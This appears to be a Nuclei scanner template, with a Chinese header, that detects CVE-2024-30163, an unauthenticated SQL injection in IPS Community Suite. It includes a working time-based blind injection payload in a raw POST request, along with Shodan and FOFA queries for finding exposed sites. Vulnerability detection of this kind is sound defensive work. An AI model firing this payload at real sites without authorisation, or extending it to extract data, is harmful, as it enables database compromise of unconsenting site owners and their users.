漏洞描述
IPS Community Suite is vulnerable to unauthenticated SQL injection via the filter[] parameter in the /index.php?/store/ endpoint, allowing attackers to extract sensitive information from the database.
CVE-2024-30163: IPS Community Suite - Unauthenticated SQL Injection
PoC代码[已公开]
id: CVE-2024-30163
info:
name: IPS Community Suite - Unauthenticated SQL Injection
author: ritikchaddha
severity: critical
description: |
IPS Community Suite is vulnerable to unauthenticated SQL injection via the filter[] parameter in the /index.php?/store/ endpoint, allowing attackers to extract sensitive information from the database.
impact: |
Unauthenticated attackers can execute arbitrary SQL queries, potentially extracting or modifying sensitive database information.
remediation: |
Update IPS Community Suite to a version that patches CVE-2024-30163.
reference:
- https://karmainsecurity.com/pocs/CVE-2024-30163.php
- https://nvd.nist.gov/vuln/detail/CVE-2024-30163
classification:
cve-id: CVE-2024-30163
cwe-id: CWE-89
epss-score: 0.46372
epss-percentile: 0.97553
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
metadata:
vendor: invision
product: ips_community_suite
max-request: 1
verified: true
shodan-query: html:"invision community"
fofa-query: body="invision community"
tags: cve,cve2024,ips,invision-community,sqli,vuln
http:
- raw:
- |
@timeout: 30s
POST /index.php?/store/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cat=1&filter[%60%20ON%201%20UNION%20SELECT%20IF(ORD(SUBSTR((1),1,1))%3C126,1,SLEEP(7))%20OR%20%3F%3D%3F%23]=1
matchers:
- type: dsl
dsl:
- "duration>=7"
- "contains(tolower(body), 'invision community')"
condition: and
# digest: 4a0a00473045022100f4aca250fda47be97e53b482ff138a61e4dec0f1dcd4ffc5e43eaf67b7797c9a022075983d786d89b9e9659dd7c32a8fd748eb900c4fd07919d1c695ca6d4650da7b:922c64590222798bb761d5b6d8e72950